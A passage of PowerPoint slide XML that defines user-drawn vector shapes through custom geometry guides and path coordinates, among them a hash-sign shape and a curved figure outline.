          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4779"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29"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4926"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30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5125"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1"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5261" y="1108"/>
              <a:ext cx="188" cy="218"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 188"/>
                <a:gd name="T1" fmla="*/ 67 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 188"/>
                <a:gd name="T3" fmla="*/ 85 h 218"/>
                <a:gd name="T4" fmla="*/ 142 w 188"/>
                <a:gd name="T5" fmla="*/ 85 h 218"/>
                <a:gd name="T6" fmla="*/ 131 w 188"/>
                <a:gd name="T7" fmla="*/ 135 h 218"/>
                <a:gd name="T8" fmla="*/ 177 w 188"/>
                <a:gd name="T9" fmla="*/ 135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5 h 218"/>
                <a:gd name="T32" fmla="*/ 48 w 188"/>
                <a:gd name="T33" fmla="*/ 135 h 218"/>
                <a:gd name="T34" fmla="*/ 58 w 188"/>
                <a:gd name="T35" fmla="*/ 85 h 218"/>
                <a:gd name="T36" fmla="*/ 11 w 188"/>
                <a:gd name="T37" fmla="*/ 85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5 h 218"/>
                <a:gd name="T60" fmla="*/ 78 w 188"/>
                <a:gd name="T61" fmla="*/ 85 h 218"/>
                <a:gd name="T62" fmla="*/ 67 w 188"/>
                <a:gd name="T63" fmla="*/ 135 h 218"/>
                <a:gd name="T64" fmla="*/ 110 w 188"/>
                <a:gd name="T65" fmla="*/ 135 h 218"/>
                <a:gd name="T66" fmla="*/ 121 w 188"/>
                <a:gd name="T67" fmla="*/ 8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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="67"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="121" y="85"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110"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32"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478"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33"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5904" y="1103"/>
              <a:ext cx="82"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4"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6051"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35"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="62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36"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="639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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6547"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38"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6744"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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6893"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0"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7043"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1"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7192"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2"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7340"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443"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="753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444"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7686"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445"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5672" y="1096"/>
              <a:ext cx="218" cy="255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 175 w 179"/>
                <a:gd name="T1" fmla="*/ 173 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 179"/>
                <a:gd name="T3" fmla="*/ 208 h 209"/>
                <a:gd name="T4" fmla="*/ 81 w 179"/>
                <a:gd name="T5" fmla="*/ 198 h 209"/>
                <a:gd name="T6" fmla="*/ 32 w 179"/>
                <a:gd name="T7" fmla="*/ 201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59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3 h 209"/>
                <a:gd name="T40" fmla="*/ 161 w 179"/>
                <a:gd name="T41" fmla="*/ 152 h 209"/>
                <a:gd name="T42" fmla="*/ 88 w 179"/>
                <a:gd name="T43" fmla="*/ 71 h 209"/>
                <a:gd name="T44" fmla="*/ 102 w 179"/>
                <a:gd name="T45" fmla="*/ 67 h 209"/>
                <a:gd name="T46" fmla="*/ 73 w 179"/>
                <a:gd name="T47" fmla="*/ 79 h 209"/>
                <a:gd name="T48" fmla="*/ 63 w 179"/>
                <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                <a:gd name="T68" fmla="*/ 119 w 179"/>
                <a:gd name="T69" fmla="*/ 171 h 209"/>
                <a:gd name="T70" fmla="*/ 126 w 179"/>
                <a:gd name="T71" fmla="*/ 145 h 209"/>
                <a:gd name="T72" fmla="*/ 126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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="176"/>
                    <a:pt x="179" y="179"/>
                    <a:pt x="176" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="185"/>
                    <a:pt x="170" y="187"/>
                    <a:pt x="166" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="193"/>
                    <a:pt x="148" y="199"/>
                    <a:pt x="141" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="207"/>
                    <a:pt x="137" y="208"/>
                    <a:pt x="134" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="209"/>
                    <a:pt x="128" y="208"/>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1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="200"/>
                    <a:pt x="18" y="198"/>
                    <a:pt x="11" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="196"/>
                    <a:pt x="7" y="196"/>
                    <a:pt x="5" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="193"/>
                    <a:pt x="0" y="191"/>
                    <a:pt x="1" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="186"/>
                    <a:pt x="2" y="185"/>
                    <a:pt x="2" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="180"/>
                    <a:pt x="4" y="176"/>
                    <a:pt x="3" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="170"/>
                    <a:pt x="2" y="168"/>
                    <a:pt x="2" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="162"/>
                    <a:pt x="3" y="160"/>
                    <a:pt x="7" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="159"/>
                    <a:pt x="12" y="159"/>
                    <a:pt x="14" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="158"/>
                    <a:pt x="22" y="154"/>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3"/>
                    <a:pt x="4" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="169"/>
                    <a:pt x="6" y="170"/>
                    <a:pt x="6" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="176"/>
                    <a:pt x="8" y="179"/>
                    <a:pt x="6" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="184"/>
                    <a:pt x="5" y="186"/>
                    <a:pt x="4" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="190"/>
                    <a:pt x="4" y="191"/>
                    <a:pt x="7" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="193"/>
                    <a:pt x="11" y="193"/>
                    <a:pt x="13" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="196"/>
                    <a:pt x="35" y="199"/>
                    <a:pt x="45" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="203"/>
                    <a:pt x="52" y="204"/>
                    <a:pt x="55" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="202"/>
                    <a:pt x="66" y="197"/>
                    <a:pt x="65" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="185"/>
                    <a:pt x="62" y="182"/>
                    <a:pt x="60" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="169"/>
                    <a:pt x="49" y="160"/>
                    <a:pt x="42" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="149"/>
                    <a:pt x="37" y="147"/>
                    <a:pt x="35" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="143"/>
                    <a:pt x="29" y="142"/>
                    <a:pt x="27" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="145"/>
                    <a:pt x="25" y="144"/>
                    <a:pt x="25" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="140"/>
                    <a:pt x="24" y="136"/>
                    <a:pt x="25" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="132"/>
                    <a:pt x="26" y="131"/>
                    <a:pt x="27" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="124"/>
                    <a:pt x="32" y="118"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="106"/>
                    <a:pt x="39" y="99"/>
                    <a:pt x="43" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="90"/>
                    <a:pt x="49" y="86"/>
                    <a:pt x="52" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="80"/>
                    <a:pt x="56" y="76"/>
                    <a:pt x="58" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="70"/>
                    <a:pt x="60" y="67"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="57"/>
                    <a:pt x="59" y="51"/>
                    <a:pt x="59" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="38"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="16"/>
                    <a:pt x="63" y="8"/>
                    <a:pt x="73" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="0"/>
                    <a:pt x="97" y="1"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="6"/>
                    <a:pt x="114" y="11"/>
                    <a:pt x="117" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="23"/>
                    <a:pt x="122" y="29"/>
                    <a:pt x="122" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="39"/>
                    <a:pt x="122" y="43"/>
                    <a:pt x="123" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="61"/>
                    <a:pt x="128" y="74"/>
                    <a:pt x="138" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="97"/>
                    <a:pt x="156" y="112"/>
                    <a:pt x="159" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="133"/>
                    <a:pt x="161" y="138"/>
                    <a:pt x="160" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="144"/>
                    <a:pt x="159" y="145"/>
                    <a:pt x="159" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="147"/>
                    <a:pt x="158" y="147"/>
                    <a:pt x="157" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="148"/>
                    <a:pt x="154" y="150"/>
                    <a:pt x="153" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="154"/>
                    <a:pt x="149" y="156"/>
                    <a:pt x="147" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="160"/>
                    <a:pt x="139" y="160"/>
                    <a:pt x="135" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="158"/>
                    <a:pt x="132" y="157"/>
                    <a:pt x="131" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="153"/>
                    <a:pt x="129" y="152"/>
                    <a:pt x="128" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="149"/>
                    <a:pt x="126" y="147"/>
                    <a:pt x="125" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="148"/>
                    <a:pt x="122" y="149"/>
                    <a:pt x="121" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="155"/>
                    <a:pt x="120" y="159"/>
                    <a:pt x="121" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="170"/>
                    <a:pt x="123" y="178"/>
                    <a:pt x="122" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="188"/>
                    <a:pt x="121" y="191"/>
                    <a:pt x="122" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="201"/>
                    <a:pt x="129" y="204"/>
                    <a:pt x="136" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="201"/>
                    <a:pt x="142" y="199"/>
                    <a:pt x="144" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="191"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="165" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="185"/>
                    <a:pt x="170" y="183"/>
                    <a:pt x="173" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="182"/>
                    <a:pt x="174" y="181"/>
                    <a:pt x="175" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="179"/>
                    <a:pt x="176" y="178"/>
                    <a:pt x="175" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="175"/>
                    <a:pt x="172" y="174"/>
                    <a:pt x="171" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="173"/>
                    <a:pt x="169" y="172"/>
                    <a:pt x="168" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="171"/>
                    <a:pt x="161" y="167"/>
                    <a:pt x="160" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="160"/>
                    <a:pt x="160" y="157"/>
                    <a:pt x="160" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="154"/>
                    <a:pt x="160" y="153"/>
                    <a:pt x="161" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="71"/>
                    <a:pt x="74" y="73"/>
                    <a:pt x="77" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="74"/>
                    <a:pt x="85" y="73"/>
                    <a:pt x="88" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="70"/>
                    <a:pt x="94" y="68"/>
                    <a:pt x="98" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="66"/>
                    <a:pt x="100" y="65"/>
                    <a:pt x="101" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="65"/>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="67"/>
                    <a:pt x="102" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="68"/>
                    <a:pt x="100" y="69"/>
                    <a:pt x="99" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="71"/>
                    <a:pt x="91" y="74"/>
                    <a:pt x="87" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="78"/>
                    <a:pt x="83" y="79"/>
                    <a:pt x="81" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="82"/>
                    <a:pt x="76" y="81"/>
                    <a:pt x="73" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="76"/>
                    <a:pt x="69" y="74"/>
                    <a:pt x="67" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="70"/>
                    <a:pt x="66" y="70"/>
                    <a:pt x="65" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="72"/>
                    <a:pt x="64" y="74"/>
                    <a:pt x="63" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="79"/>
                    <a:pt x="61" y="81"/>
                    <a:pt x="60" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="86"/>
                    <a:pt x="57" y="88"/>
                    <a:pt x="57" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="94"/>
                    <a:pt x="58" y="96"/>
                    <a:pt x="58" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="98"/>
                    <a:pt x="57" y="99"/>
                    <a:pt x="56" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="104"/>
                    <a:pt x="52" y="108"/>
                    <a:pt x="50" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="117"/>
                    <a:pt x="46" y="122"/>
                    <a:pt x="46" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="130"/>
                    <a:pt x="46" y="133"/>
                    <a:pt x="46" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="137"/>
                    <a:pt x="45"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1"/>
                    <a:pt x="38" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="121"/>
                    <a:pt x="37" y="122"/>
                    <a:pt x="37" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="127"/>
                    <a:pt x="35" y="131"/>
                    <a:pt x="36"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4"/>
                    <a:pt x="67" y="176"/>
                    <a:pt x="64" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="177"/>
                    <a:pt x="63" y="177"/>
                    <a:pt x="62" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="179"/>
                    <a:pt x="65" y="181"/>
                    <a:pt x="66" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="185"/>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2"/>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3" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="173"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="115" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="172"/>
                    <a:pt x="116" y="173"/>
                    <a:pt x="117" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="178"/>
                    <a:pt x="117" y="182"/>
                    <a:pt x="115" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="188"/>
                    <a:pt x="114" y="190"/>
                    <a:pt x="114" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="194"/>
                    <a:pt x="114" y="195"/>
                    <a:pt x="116" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="191"/>
                    <a:pt x="118" y="186"/>
                    <a:pt x="119" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="178"/>
                    <a:pt x="120" y="174"/>
                    <a:pt x="119" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="167"/>
                    <a:pt x="118" y="163"/>
                    <a:pt x="118" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="156"/>
                    <a:pt x="118" y="153"/>
                    <a:pt x="119" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="147"/>
                    <a:pt x="122" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="142"/>
                    <a:pt x="129" y="140"/>
                    <a:pt x="132" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="137"/>
                    <a:pt x="141" y="138"/>
                    <a:pt x="146" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="138"/>
                    <a:pt x="142" y="137"/>
                    <a:pt x="140" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="119"/>
                    <a:pt x="135" y="97"/>
                    <a:pt x="126" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="97"/>
                    <a:pt x="134" y="103"/>
                    <a:pt x="136" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="116"/>
                    <a:pt x="140" y="123"/>
                    <a:pt x="139" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="135"/>
                    <a:pt x="136" y="137"/>
                    <a:pt x="132" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="138"/>
                    <a:pt x="128" y="137"/>
                    <a:pt x="128" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="132"/>
                    <a:pt x="127" y="130"/>
                    <a:pt x="127" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="121"/>
                    <a:pt x="126" y="114"/>
                    <a:pt x="124" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="102"/>
                    <a:pt x="121" y="98"/>
                    <a:pt x="117" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="86"/>
                    <a:pt x="112" y="79"/>
                    <a:pt x="107" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="70"/>
                    <a:pt x="105" y="67"/>
                    <a:pt x="106" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="62"/>
                    <a:pt x="106" y="60"/>
                    <a:pt x="107" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="55"/>
                    <a:pt x="106" y="54"/>
                    <a:pt x="104" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="52"/>
                    <a:pt x="97" y="50"/>
                    <a:pt x="94" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="48"/>
                    <a:pt x="91" y="46"/>
                    <a:pt x="91" y="44"/>
